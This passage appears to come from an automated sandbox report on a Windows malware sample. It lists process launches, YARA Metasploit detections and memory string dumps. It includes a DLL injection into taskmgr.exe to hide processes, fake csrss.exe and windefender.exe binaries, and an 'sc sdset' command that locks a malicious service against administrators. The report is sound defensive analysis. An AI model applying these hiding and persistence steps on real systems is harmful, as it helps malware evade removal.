                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:39:13
                                                            Start date:20/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                            Imagebase:0x7ff6a0090000
                                                            File size:288256 bytes
                                                            MD5 hash:D98E33B66343E7C96158444127A117F6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 14%, Metadefender, Browse
                                                            • Detection: 73%, ReversingLabs

                                                            General

                                                            Start time:12:39:14
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:14
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\windefender.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\windefender.exe
                                                            Imagebase:0x400000
                                                            File size:2102272 bytes
                                                            MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 29%, Metadefender, Browse
                                                            • Detection: 57%, ReversingLabs

                                                            General

                                                            Start time:12:39:15
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000026.00000002.426639210.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:39:15
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:16
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                            Imagebase:0x2a0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:16
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                            Imagebase:0xa50000
                                                            File size:60928 bytes
                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:19
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\windefender.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\windefender.exe
                                                            Imagebase:0x400000
                                                            File size:2102272 bytes
                                                            MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:29
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:41
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:40:00
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Disassembly

                                                            Code Analysis

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                              • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                              • ", xrefs: 00428CF9
                                                              • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                              • API String ID: 0-2405844374
                                                              • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                              • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                              • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                              • API String ID: 0-626581767
                                                              • Opcode ID: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction ID: 0ae21cd2affb92439e9d6b24f9167d9253c8ca15ed842762288491891e5b1343
                                                              • Opcode Fuzzy Hash: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction Fuzzy Hash: 9251D4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                              • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                              • ", xrefs: 00428CF9
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                              • API String ID: 0-2405844374
                                                              • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                              • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                              • API String ID: 0-626581767
                                                              • Opcode ID: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction ID: 0ae21cd2affb92439e9d6b24f9167d9253c8ca15ed842762288491891e5b1343
                                                              • Opcode Fuzzy Hash: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction Fuzzy Hash: 9251D4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                              • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                              • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                              • ", xrefs: 00428CF9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                              • API String ID: 0-2405844374
                                                              • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                              • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                              • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                              • API String ID: 0-626581767
                                                              • Opcode ID: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction ID: 0ae21cd2affb92439e9d6b24f9167d9253c8ca15ed842762288491891e5b1343
                                                              • Opcode Fuzzy Hash: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction Fuzzy Hash: 9251D4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                              • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                              • ", xrefs: 00428CF9
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                              • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                              • API String ID: 0-2405844374
                                                              • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                              • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                              • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
